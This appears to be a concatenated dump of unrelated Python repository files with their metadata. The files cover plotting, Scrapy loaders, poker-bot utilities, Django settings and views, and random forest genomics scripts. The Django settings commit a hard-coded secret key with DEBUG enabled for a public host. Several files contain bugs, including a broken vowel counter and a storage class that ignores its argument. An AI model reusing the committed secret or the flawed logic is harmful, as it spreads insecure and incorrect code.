        cp = self.ax.contourf(X, Y, Z, cmap='binary', alpha=0.7)
        self.fig.colorbar(cp)
    def setup_plot(self):
        """Initial drawing of the scatter plot."""
        # Current generation points.
        x = [point[0] for point in self.data[0]]
        y = [point[1] for point in self.data[0]]
        self.scatter = self.ax.scatter(x, y, marker='.', c='blue', alpha=0.5)
        # Current optimal solution.
        self.center = self.ax.scatter(self.pbest[0][0], self.pbest[0][1], marker='^', c='red')
        # Global optimum solution. (Benchmark)
        # x_opt = [point[0] for point in self.global_opt]
        # y_opt = [point[1] for point in self.global_opt]
        # self.opt = self.ax.scatter(x_opt, y_opt, marker='o', c='green')
        # Axis settings.
        self.ax.set_title(self.title)
        self.ax.set_xlim(self.boundary[0])
        self.ax.set_ylim(self.boundary[1])
        self.ax.set_xlabel("Iteration: 0")
        # For FuncAnimation's sake, we need to return the artist we'll be using
        # Note that it expects a sequence of artists, thus the trailing comma.
        return self.scatter,
    def update(self, i):
        """Update the scatter plot."""
        # NOTE(review): self.center's offsets change too, but only
        # self.scatter is returned; with blit=True the best-point marker may
        # not be redrawn - confirm whether center should be returned as well.
        self.scatter.set_offsets(self.data[i])
        self.center.set_offsets(self.pbest[i])
        self.ax.set_xlabel("Iteration: %d" % (i + 1))
        return self.scatter,
    def save(self, path):
        """Write the animation to *path* via matplotlib's writer machinery."""
        self.ani.save(path)
if __name__ == '__main__':
    # NOTE(review): AnimatedScatter requires a `data` dict ('solution',
    # 'solution_best', 'boundary'); this zero-argument call raises TypeError
    # and looks like a leftover manual-test stub.
    a = AnimatedScatter()
plt.show() | [
"60725360+StevenZ315@users.noreply.github.com"
] | 60725360+StevenZ315@users.noreply.github.com |
0cccc8e1b758dacc3f7b7e91e84134b790b30861 | 9d39abfcb87440cdbaf33a6503587bcc884647e2 | /Lesson_5/hh_parse/hh_parse/spiders/loaders.py | c81f7304dcb93f0eef6ae0ea57ec9aad8eb3b265 | [] | no_license | mik-79-ekb/Datamining | 7a100c7b004aff92a71a97a5c3758fda189502f7 | de345349a31baae17b51eaff001f144906dcaa48 | refs/heads/main | 2023-06-12T02:43:36.865026 | 2021-07-09T09:42:53 | 2021-07-09T09:42:53 | 369,628,774 | 0 | 0 | null | 2021-07-09T09:42:54 | 2021-05-21T18:58:01 | Python | UTF-8 | Python | false | false | 1,241 | py | from scrapy.loader import ItemLoader
from itemloaders.processors import TakeFirst, MapCompose
from .processors import flat_text, hh_user_url, hh_sphere_activities_clean, concatenate_items
class HHVacancyLoader(ItemLoader):
    """Scrapy ItemLoader for hh.ru vacancy pages.

    The TakeFirst output processors collapse collected values to a single
    one; salary/description are flattened to plain text, and author values
    are passed through the project's hh_user_url processor on input.
    """
    default_item_class = dict
    item_type_out = TakeFirst()
    url_out = TakeFirst()
    title_out = TakeFirst()
    salary_out = flat_text
    description_out = flat_text
    author_in = MapCompose(hh_user_url)
    author_out = TakeFirst()
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Tag each item with its source URL (when a response is present in
        # the loader context) and mark the record type as 'vacancy'.
        if self.context.get("response"):
            self.add_value("url", self.context["response"].url)
        self.add_value("item_type", "vacancy")
class HHCompanyLoader(ItemLoader):
    """Scrapy ItemLoader for hh.ru company (employer) pages.

    Company name fragments are concatenated on input; sphere-of-activity
    values are cleaned by the project's hh_sphere_activities_clean processor.
    """
    default_item_class = dict
    item_type_out = TakeFirst()
    url_out = TakeFirst()
    company_name_in = concatenate_items
    company_name_out = TakeFirst()
    company_site_out = TakeFirst()
    sphere_activities_in = MapCompose(hh_sphere_activities_clean)
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Tag each item with its source URL when a response is available.
        if self.context.get("response"):
            self.add_value("url", self.context["response"].url)
self.add_value("item_type", "company") | [
"2068811@gmail.com"
] | 2068811@gmail.com |
cde20cb3464818d38c4f964502b21319c010bad4 | 2c872fedcdc12c89742d10c2f1c821eed0470726 | /pbase/day09/code/text_args.py | bf20be1ef127a5651f828ffc51ef6a1001634dcd | [] | no_license | zuigehulu/AID1811 | 581c3c7a37df9fa928bc632e4891fc9bafe69201 | 10cab0869875290646a9e5d815ff159d0116990e | refs/heads/master | 2020-04-19T16:33:04.174841 | 2019-01-30T07:58:24 | 2019-01-30T07:58:24 | 168,307,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | def mysum(*args):
    # Variadic sum: mysum(1, 2, 3) == 6.
    return sum(args)
# Quick smoke tests printing 3, 10 and 36.
print(mysum(1,2))
print(mysum(1,2,3,4))
print(mysum(1,2,3,4,5,6,7,8))
| [
"442315617@qq.com"
] | 442315617@qq.com |
42757135dc0556c81a651638ff62924bd270bc0c | 497c6810f06f1b4a5ceadec53dbf59371b709b18 | /main_files/holdem/utilities.py | e43415864ccc64db521cd606d48787f53ac9320f | [] | no_license | HorstBoy/MLFYP_Project | 92e72e8f3ea9da1908c1d034fce0cee940ee0424 | cfd60c70e4a16d697e14af9947a33b01cf540cf9 | refs/heads/master | 2023-08-06T05:30:19.926049 | 2021-08-14T00:06:25 | 2021-08-14T00:06:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,564 | py | from include import *
def which_round(community_cards):
    """Name the betting street implied by the number of dealt board cards.

    Undealt cards are encoded as -1 in `community_cards`.  Returns
    'Preflop', 'Flop', 'Turn' or 'River' for 0/3/4/5 dealt cards and an
    empty string for any other count.
    """
    dealt = sum(1 for card in community_cards if card != -1)
    street_by_count = {0: 'Preflop', 3: 'Flop', 4: 'Turn', 5: 'River'}
    return street_by_count.get(dealt, '')
def fill_range_structure(_round, player):
    """Return the hand-range/strength table for the given street.

    `player` is accepted for interface compatibility but is not consulted.
    Unknown street names yield None.  The tables themselves come from the
    module-level star import (`include`).
    """
    if _round == 'Preflop':
        return preflop_range
    if _round == 'Flop':
        return hand_strength_flop
    if _round == 'Turn':
        return hand_strength_turn
    if _round == 'River':
        return hand_strength_river
    return None
def set_attributes(hand_strength, evaluation, player, rc, score_desc, event):
    """Record a street's evaluation results on the player, exactly once.

    Selects the player's per-street evaluation dict (evaluation_preflop /
    evaluation_flop / evaluation_turn / evaluation_river) from `event` and
    fills it only if it has not been written yet (its "he" slot is still
    the empty string).  Unknown events are ignored, matching the original
    if/elif chain's fall-through behavior.
    """
    # Map street name -> attribute holding that street's evaluation dict;
    # replaces four identical copy-pasted branches.
    attr_by_event = {
        'Preflop': 'evaluation_preflop',
        'Flop': 'evaluation_flop',
        'Turn': 'evaluation_turn',
        'River': 'evaluation_river',
    }
    attr = attr_by_event.get(event)
    if attr is None:
        return
    target = getattr(player, attr)
    if target["he"] == '':
        target["hand_strength"] = hand_strength
        target["he"] = player.he
        target["rc"] = rc
        target["score_desc"] = score_desc
        target["evaluation"] = evaluation
def highest_in_LR(player_o, env):
    """Return (highest raise level, seat holding it) from env.level_raises.

    Starts from (0, 0), so only strictly positive levels can win, and ties
    keep the first seat encountered.  `player_o` is unused but kept for
    interface compatibility.
    """
    best_value, best_seat = 0, 0
    for seat, level in env.level_raises.items():
        if level > best_value:
            best_value, best_seat = level, seat
    return best_value, best_seat
def calc_raises_i_face(player_o, env):
    """Return how many raises player_o still has to match this round.

    Adds the gap between the table's highest raise level and this player's
    own level to the raises already owed in the player's round state.
    """
    seat = player_o.get_seat()
    table_high, _ = highest_in_LR(player_o, env)
    shortfall = table_high - env.level_raises[seat]
    return player_o.round['raises_i_owe'] + shortfall
def assign_evals_player(player_o, _round, env):
    """Evaluate player_o's hand for this street and refresh round state.

    Pulls the evaluation tuple from the player's hand evaluator, records it
    once via set_attributes, rebuilds the player's legal-move list, and
    updates the number of raises the player must still match.
    """
    strength, evaluation, rc, desc, _hand, _board = player_o.he.get_evaluation(_round)
    set_attributes(strength, evaluation, player_o, rc, desc, _round)
    player_o.populatePlayerPossibleMoves(env)
    player_o.round['raises_i_owe'] = calc_raises_i_face(player_o, env)
def do_necessary_env_cleanup(env):
    """Remove busted players (stack <= 0) from env and reseat the rest.

    Iterates over a snapshot of env._player_dict so removals do not mutate
    the mapping being traversed.  Returns True if at least one player was
    removed (an end-game condition), otherwise False.

    Fix: the original initialized is_end_game to False and then immediately
    dead-stored None over it, so the no-removal path returned None instead
    of the intended False.
    """
    is_end_game = False
    for player in list(env._player_dict.values()):
        if player.stack <= 0:
            env.remove_player(player.get_seat())
            is_end_game = True  # at least one bust -> end game
    env.assign_positions()
    return is_end_game
def convert_list_to_tupleA(learner_bot_state, community_state):
    """Flatten two two-part state sequences into one hashable tuple.

    The first two elements of each argument are converted to tuples and
    concatenated in order (bot features, bot cards, community parts),
    producing a flat tuple suitable for use as a dictionary key.
    """
    bot_parts = [tuple(part) for part in learner_bot_state]
    community_parts = [tuple(part) for part in community_state]
    return bot_parts[0] + bot_parts[1] + community_parts[0] + community_parts[1]
class action_table:
    # Action codes exchanged with the poker environment.
    CHECK = 0
    CALL = 1
    RAISE = 2
    FOLD = 3
    # Placeholder for the "amount" slot of actions that carry no amount.
    # Note it shares the value 0 with CHECK.
    NA = 0
def convert_step_return_to_action(action_from_step):
    """Collapse a (verb, amount) step result into a compact action id.

    'call'/'check' -> 0, 'raise'/'bet' -> 1, anything else (e.g. 'fold') -> 2.
    """
    verb = action_from_step[0]
    if verb in ('call', 'check'):
        return 0
    if verb in ('raise', 'bet'):
        return 1
    return 2
def safe_actions_call_bot(community_infos, villain_choice, n_seats):
    """Build a default action list where every seat checks, except the actor.

    community_infos[-3] is the seat currently acting and community_infos[-1]
    the amount it faces.  When there is something to call, the acting seat
    either calls (villain_choice is None) or plays villain_choice's
    (action, amount) pair as-is.

    Fix: the original built the list with ``[[...]] * n_seats``, which made
    every seat share one inner list object, so mutating one seat's entry in
    place would silently change all of them.  Each seat now gets its own pair.
    """
    current_player = community_infos[-3]
    to_call = community_infos[-1]
    actions = [[action_table.CHECK, action_table.NA] for _ in range(n_seats)]
    if to_call > 0:
        if villain_choice is None:
            actions[current_player] = [action_table.CALL, action_table.NA]
        else:
            actions[current_player] = [villain_choice[0], villain_choice[1]]
    return actions
def compress_bucket(state, env, pre=False):
    """Bucket stack sizes and hand ranks in place to coarser values.

    For a [stack, rank] pair: the stack becomes
    round((stack / env.starting_stack_size) * (stack / 100)) and the rank
    (skipped when it is the -1 sentinel) becomes round((rank / 7462) * 169).
    With pre=True only state[0][0][0] is compressed; otherwise the pairs at
    state[0][0] and state[2][0] are.  Mutates and returns `state`.
    """
    def _squash(pair):
        pair[0] = round((pair[0] / env.starting_stack_size) * (pair[0] / 100))
        if pair[1] != -1:
            pair[1] = round((pair[1] / 7462) * (16900 / 100))

    if pre:
        _squash(state[0][0][0])
    else:
        _squash(state[0][0])
        _squash(state[2][0])
    return state
def convert_step_return_to_set(sar):
    """Flatten one (state, action, reward) step into a one-element state list.

    Extracts the player feature vector (sar[0][0][0][0]), the player cards
    (sar[0][0][0][1]) and the community state (sar[0][1][0]), concatenates
    them into a single flat tuple, and returns it wrapped in a list - the
    same shape the original accumulator-list version produced.
    """
    player_features = tuple(sar[0][0][0][0])
    player_cards = tuple(sar[0][0][0][1])
    community_state = tuple(sar[0][1][0])
    return [player_features + player_cards + community_state]
| [
"garyjh126@gmail.com"
] | garyjh126@gmail.com |
eb1d56fce359772a0815850648aed190af310eb2 | 7c61922c2de52ea684a39a002355eff6551bf930 | /getcount.py | 33de2b911f0d1b8b0652e5e8f9650e44c86dcae2 | [] | no_license | DongDong-123/codewars | ac3e6b5d5dab78ef60140ac87b9c02cc8dba646c | 723750fed649ea763a2363604dd6dea3359216a8 | refs/heads/master | 2020-03-21T15:48:19.316417 | 2019-01-04T14:44:54 | 2019-01-04T14:44:54 | 138,733,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | def getCount(inputStr):
#num_vowels = 0
inputStr = inputStr.lower()
vowels = ['a','e','i','o','u']
b = []
for i in inputStr:
b.append(i)
for j in b and vowels:
num_vowels = inputStr.count(i)
return num_vowels
#inputStr = "abracadabra"
# Smoke test: "abracadabra" contains 5 vowels.
a = getCount("abracadabra")
print(a)
| [
"zisehaiyang04@163.com"
] | zisehaiyang04@163.com |
0243ff78399d38a3045a581bfcc42a1089a3428b | 8df1516bcfdcf5247058ceaaeccfc0253fecd8a9 | /mysite/settings.py | 98882cb31cf2a124b71a58e890ef1a4cdd85ae8f | [] | no_license | noorhashem/DjangoBlog | 16fd3c768bb97a1c0ddfc11d4a938c4eefa81a8c | 546c7423480d1bb8b63299b619bf783135043953 | refs/heads/master | 2022-03-22T15:11:06.467269 | 2019-11-20T14:39:14 | 2019-11-20T14:39:14 | 222,958,751 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,195 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment (e.g. os.environ['DJANGO_SECRET_KEY']) before any
# production deployment.
SECRET_KEY = '*w*uua%kq^z8e*4=cwf6ym86#=hl8icz$pkwfsd+)6e5(-e=m6'
# SECURITY WARNING: don't run with debug turned on in production!
# NOTE(review): DEBUG=True combined with the public '.pythonanywhere.com'
# host below exposes stack traces and settings to visitors - disable for
# any deployed instance.
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog.apps.BlogConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'EET'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"nour.hashem95@gmail.com"
] | nour.hashem95@gmail.com |
5b94b6c1bf6f6eeb1e1c275c7214f237e6677589 | 05ad72ac66cfa8afa94b68002751cb9bc0cf4b7c | /manage.py | cb4d929db7c1f566d31be824390f38d864a4efca | [] | no_license | fibodude/fibonache | 4c723dbba87a275c7e183571706c6a39b7ed5ad2 | 67b64804e802f08202181df4360cee2d89fbc268 | refs/heads/master | 2020-06-12T10:50:33.960135 | 2016-12-05T03:53:13 | 2016-12-05T03:53:13 | 75,587,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Standard Django management entry point for the `fibonache` project:
    # point Django at the project settings, then dispatch the requested
    # management command (runserver, migrate, ...) from argv.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "fibonache.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)
| [
"email@mail.com"
] | email@mail.com |
10ea113a04936eea9ac52168ce39061c93348f1b | 54dd9dc1ae1ab2013bcf9fc9c32c6623c55f1b3c | /patch_level_features/create_object_level_histogram_old.py | 59df1b3dcb93570d694ff928eefbe174eda9de62 | [] | no_license | liuwenhaha/SEER_distro | 27f74126cfa0f9f044c1cf5a5fdfd61b76145f59 | b5027c69808eb64724bcc9acd5e29ae2f4ab470c | refs/heads/master | 2020-08-26T11:27:56.622419 | 2019-08-13T16:54:54 | 2019-08-13T16:54:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,415 | py | import matplotlib.pyplot as plt
plt.switch_backend('agg')
import matplotlib.patches as patches
import matplotlib.path as path
import numpy as np
import collections
import sys
import os
import json
import datetime
from pymongo import MongoClient
if __name__ == '__main__':
if len(sys.argv)<0:
print "usage:python create_object_level_histogram.py";
exit();
#my_home="/data1/bwang"
my_home="/home/bwang/patch_level";
picture_folder = os.path.join(my_home, 'object_level_plot');
if not os.path.exists(picture_folder):
print '%s folder do not exist, then create it.' % picture_folder;
os.makedirs(picture_folder);
print " --- read config.json file ---" ;
config_json_file_name = "config_cluster.json";
config_json_file = os.path.join(my_home, config_json_file_name);
with open(config_json_file) as json_data:
d = json.load(json_data);
patch_size = d['patch_size'];
db_host = d['db_host'];
db_port = d['db_port'];
db_name1 = d['db_name1'];
db_name2 = d['db_name2'];
print patch_size,db_host,db_port,db_name1,db_name2;
client = MongoClient('mongodb://'+db_host+':'+db_port+'/');
db2 = client[db_name2];
features_histogram = db2.features_histogram;
for record in features_histogram.find({'data_range':'object_level'},{"_id":0,"date":0,"data_range":0}):
case_id=record["case_id"];
feature=record["feature"];
if (feature=='nucleus_area'):
feature_name="nucleus area (Micron square)";
elif (feature=='elongation'):
feature_name="elongation (Micron)";
elif (feature=='circularity'):
feature_name="circularity (Micron)";
else:
feature_name = feature;
n=record["hist_count_array"];
bins=record["bin_edges_array"];
print case_id,feature;
total_object_count=0;
for count in n:
total_object_count=total_object_count+ count;
fig, ax = plt.subplots()
# get the corners of the rectangles for the histogram
left = np.array(bins[:-1])
right = np.array(bins[1:])
bottom = np.zeros(len(left))
top = bottom + n
# we need a (numrects x numsides x 2) numpy array for the path helper
# function to build a compound path
XY = np.array([[left, left, right, right], [bottom, top, top, bottom]]).T
# get the Path object
barpath = path.Path.make_compound_path_from_polys(XY)
# make a patch out of it
patch = patches.PathPatch(barpath)
ax.add_patch(patch)
# update the view limits
ax.set_xlim(left[0], right[-1])
ax.set_ylim(bottom.min(), top.max())
plt.xlabel(feature_name)
plt.ylabel('Object Count')
plt.title("Object level "+ feature+ ' Histogram of image '+ str(case_id))
#Tweak spacing to prevent clipping of ylabel
plt.subplots_adjust(left=0.15)
plt.grid(True);
# place a text box in upper left in axes coords
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
textstr="Total object count: " + str(total_object_count);
ax.text(0.6, 0.95, textstr, transform=ax.transAxes, fontsize=10, verticalalignment='top', bbox=props);
#plt.show();
file_name="object_level_histogram_"+case_id+"_"+feature+".png";
graphic_file_path = os.path.join(picture_folder, file_name);
plt.savefig(graphic_file_path);
plt.gcf().clear();
exit();
| [
"noreply@github.com"
] | noreply@github.com |
aa13131b7bd493ba22905c58f1ad26b34fc32637 | 25bd28af726d7301c87b53e2d19aad1158926187 | /contact/views.py | b4ea648dce210daaf84263443533edf8ae8f0947 | [
"Apache-2.0"
] | permissive | SolomonMbak/3_a | e19b064493ebcbe1f323ab5d90d083496e86e2c4 | d5d7656091e866efa2cd5dcc7bd5bc54627ac62a | refs/heads/master | 2022-12-14T13:08:42.211524 | 2021-05-01T19:06:23 | 2021-05-01T19:06:23 | 201,625,462 | 1 | 0 | Apache-2.0 | 2022-12-08T06:00:07 | 2019-08-10T12:13:49 | HTML | UTF-8 | Python | false | false | 1,021 | py | from django.shortcuts import render
from .forms import ContactForm
from django.core.mail import send_mail
from django.contrib import messages
# Create your views here.
def contact(request):
if request.method == "POST":
form = ContactForm(request.POST)
if form.is_valid():
form.save()
messages.info(
request, "Your message has been sent successfully! Expect a response from us as soon as we can.")
email = form.cleaned_data.get('email')
subject = form.cleaned_data.get('subject')
send_mail('Message Recieved!',
'The message you just sent to us has been recieved. Do expect a response from us soon.',
'no-reply@360academia.com', [email], fail_silently=False)
return render(request, "main/index.html")
else:
form = ContactForm()
template = "contact/contact.html"
context = {
"form": form
}
return render(request, template, context)
| [
"solomonmbak@gmail.com"
] | solomonmbak@gmail.com |
35fb6cf8a00471f461fdf814f9244e942862de35 | dd2de4c00369d2f607febac282cc67fe7265b3e1 | /OntoWAS_mixedRF.py | de57f464050953940b73087f57e4f4cf5a002a48 | [] | no_license | hidentanaka/OntoWAS | b61d38775784398aa7dd9c6075c26dee4619d36b | 0fd85a3d6e1a2674dc2bc6b9cc15ef6022daad86 | refs/heads/master | 2023-07-17T16:25:28.607737 | 2021-09-08T07:15:19 | 2021-09-08T07:15:19 | 282,007,991 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,066 | py |
import numpy as np
import pandas as pd
data = np.loadtxt('inputfile_OntoT.csv', delimiter=',', dtype=float)
labels = data[:, 0:1]
features = data[:, 1:]
Z = features
y_conf = labels.ravel()
from sklearn.decomposition import PCA
pca = PCA(n_components=30)
pca.fit(Z)
X = pca.transform(Z)
import scipy as sp
import pylab as pl
get_ipython().run_line_magic('matplotlib', 'inline')
from limix.ensemble.lmm_forest import Forest as LMF
from limix.ensemble import lmm_forest_utils as utils
n_samples=965
x = sp.arange(n_samples).reshape(-1,1)
kernel=utils.getQuadraticKernel(x, d=200) + sp.eye(n_samples)*1e-8
n_samples=965
from sklearn.preprocessing import StandardScaler
stdsc = StandardScaler()
(training, test) = utils.crossValidationScheme(2, n_samples)
x_train_std = stdsc.fit_transform(X[training])
x_test_std = stdsc.transform(X[test])
lm_forest = LMF(kernel=kernel[sp.ix_(training, training)])
lm_forest.fit(x_train_std, y_conf[training])
response_tot = lm_forest.predict(x_test_std, kernel[sp.ix_(test,training)])
random_forest = LMF(kernel='iid')
random_forest.fit(x_train_std, y_conf[training])
response_iid = random_forest.predict(x_test_std)
response_fixed = lm_forest.predict(x_test_std)
from matplotlib.backends.backend_pdf import PdfPages
fig = pl.figure()
pl.plot(x, y_conf, '.7')
pl.plot(x[test], response_tot, 'r-.')
pl.plot(x[test], response_fixed, 'c-.')
pl.plot(x[test], response_iid, 'b-.')
pl.title('prediction')
pl.xlabel('genotype (in decimal encoding)')
pl.ylabel('phenotype')
pl.legend(['fixed effect + confounding',
'mixed RF', 'mixed RF (fixed effect)', 'RF'],
bbox_to_anchor=(1.2, 1.4), ncol=2)
pl.show()
pp = PdfPages('output1_OntT.pdf')
pp.savefig(fig)
pp.close()
from matplotlib.backends.backend_pdf import PdfPages
fig = pl.figure()
pl.plot(x, y_conf, '.7')
pl.plot(x[test], response_tot, 'r-.')
pl.plot(x[test], response_iid, 'b-.')
pl.title('prediction')
pl.xlabel('genotype (in decimal encoding)')
pl.ylabel('phenotype')
pl.legend(['fixed effect + confounding',
'mixed RF', 'RF'],
bbox_to_anchor=(1.2, 1.4), ncol=2)
pl.show()
pp = PdfPages('output2_OntT.pdf')
pp.savefig(fig)
pp.close()
response_tot_train = lm_forest.predict(X[training], kernel[sp.ix_(training,training)])
response_iid_train = random_forest.predict(X[training])
import numpy as np
from sklearn.model_selection import KFold
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor as RFR
import pandas as pd
print('MSE train_mixedRF : %.3f, test_mixedRF : %.3f' % (mean_squared_error(y_conf[training], response_tot_train), mean_squared_error(y_conf[test], response_tot)) )
print('r2 train_mixedRF : %.3f, test_mixedRF : %.3f' % (r2_score(y_conf[training], response_tot_train), r2_score(y_conf[test], response_tot)) )
print('MSE train : %.3f, test : %.3f' % (mean_squared_error(y_conf[training], response_iid_train), mean_squared_error(y_conf[test], response_iid)) )
print('r2 train : %.3f, test : %.3f' % (r2_score(y_conf[training], response_iid_train), r2_score(y_conf[test], response_iid)) )
feature = lm_forest.log_importance
f = pd.DataFrame({'number': range(0, len(feature)),'feature': feature[:]})
f2 = f.sort_values('feature',ascending=False)
pd.set_option('display.max_rows', 1000)
print(f2)
f2.to_csv("output3.csv")
feature = random_forest.log_importance
f = pd.DataFrame({'number': range(0, len(feature)),'feature': feature[:]})
f2 = f.sort_values('feature',ascending=False)
pd.set_option('display.max_rows', 1000)
print(f2)
f2.to_csv("output4.csv")
import numpy as np
import pandas as pd
data = np.loadtxt('inputfile_gene.csv', delimiter=',', dtype=float, skiprows=1)
labels = data[:, 0:1]
features = data[:, 1:]
X = features
y = labels.ravel()
import scipy as sp
import pylab as pl
get_ipython().run_line_magic('matplotlib', 'inline')
from limix.ensemble.lmm_forest import Forest as LMF
from limix.ensemble import lmm_forest_utils as utils
n_samples=965
x = sp.arange(n_samples).reshape(-1,1)
kernel=utils.getQuadraticKernel(x, d=200) + sp.eye(n_samples)*1e-8
n_samples=965
(training, test) = utils.crossValidationScheme(2, n_samples)
lm_forest = LMF(kernel=kernel[sp.ix_(training, training)])
lm_forest.fit(X[training], y_conf[training])
response_tot = lm_forest.predict(X[test], kernel[sp.ix_(test,training)])
random_forest = LMF(kernel='iid')
random_forest.fit(X[training], y_conf[training])
response_iid = random_forest.predict(X[test])
response_fixed = lm_forest.predict(X[test])
from matplotlib.backends.backend_pdf import PdfPages
fig = pl.figure()
pl.plot(x, y_conf, '.7')
pl.plot(x[test], response_tot, 'r-.')
pl.plot(x[test], response_fixed, 'c-.')
pl.plot(x[test], response_iid, 'b-.')
pl.title('prediction')
pl.xlabel('genotype (in decimal encoding)')
pl.ylabel('phenotype')
pl.legend(['fixed effect + confounding',
'mixed RF', 'mixed RF (fixed effect)', 'RF'],
bbox_to_anchor=(1.2, 1.4), ncol=2)
pl.show()
# set path
pp = PdfPages('output1_gene.pdf')
pp.savefig(fig)
pp.close()
from matplotlib.backends.backend_pdf import PdfPages
fig = pl.figure()
pl.plot(x, y_conf, '.7')
pl.plot(x[test], response_tot, 'r-.')
pl.plot(x[test], response_iid, 'b-.')
pl.title('prediction')
pl.xlabel('genotype (in decimal encoding)')
pl.ylabel('phenotype')
pl.legend(['fixed effect + confounding',
'mixed RF', 'RF'],
bbox_to_anchor=(1.2, 1.4), ncol=2)
pl.show()
pp = PdfPages('output2_gene.pdf')
pp.savefig(fig)
pp.close()
response_tot_train = lm_forest.predict(X[training], kernel[sp.ix_(training,training)])
response_iid_train = random_forest.predict(X[training])
import numpy as np
from sklearn.model_selection import KFold
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor as RFR
import pandas as pd
print('MSE train_mixedRF : %.3f, test_mixedRF : %.3f' % (mean_squared_error(y_conf[training], response_tot_train), mean_squared_error(y_conf[test], response_tot)) )
print('r2 train_mixedRF : %.3f, test_mixedRF : %.3f' % (r2_score(y_conf[training], response_tot_train), r2_score(y_conf[test], response_tot)) )
print('MSE train : %.3f, test : %.3f' % (mean_squared_error(y_conf[training], response_iid_train), mean_squared_error(y_conf[test], response_iid)) )
print('r2 train : %.3f, test : %.3f' % (r2_score(y_conf[training], response_iid_train), r2_score(y_conf[test], response_iid)) )
feature = lm_forest.log_importance
f = pd.DataFrame({'number': range(0, len(feature)),'feature': feature[:]})
f2 = f.sort_values('feature',ascending=False)
pd.set_option('display.max_rows', 1000)
print(f2)
f2.to_csv("output3_gene.csv")
feature = random_forest.log_importance
f = pd.DataFrame({'number': range(0, len(feature)),'feature': feature[:]})
f2 = f.sort_values('feature',ascending=False)
pd.set_option('display.max_rows', 1000)
print(f2)
f2.to_csv("output4_gene.csv")
| [
"haru.manna.2788g@gmail.com"
] | haru.manna.2788g@gmail.com |
bc88ee008ef6e29c1e09c23ca4d023b13f41c158 | 92c97577d7a411b933d852a700cba4b01a58c73a | /storage.py | 56cdd902ff4030edfc9b187218ac61e47d29679f | [] | no_license | alex-ac/ldjam | 71c91b2da87e420ff59d3ffa25c02550fee46f55 | f5b7e3c5f7d2ce6a9f069c8dd85aefa23dea25c2 | refs/heads/master | 2020-09-24T02:12:57.348943 | 2016-08-29T14:34:15 | 2016-08-29T14:34:15 | 66,726,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | import yaml
class Storage(object):
def __init__(self, last_update_id=None):
self.last_update_id = None
@classmethod
def load(cls, data):
return cls(**yaml.load(data))
def save(self):
return yaml.dump({
'last_update_id': self.last_update_id,
})
| [
"alex-ac@yandex-team.ru"
] | alex-ac@yandex-team.ru |
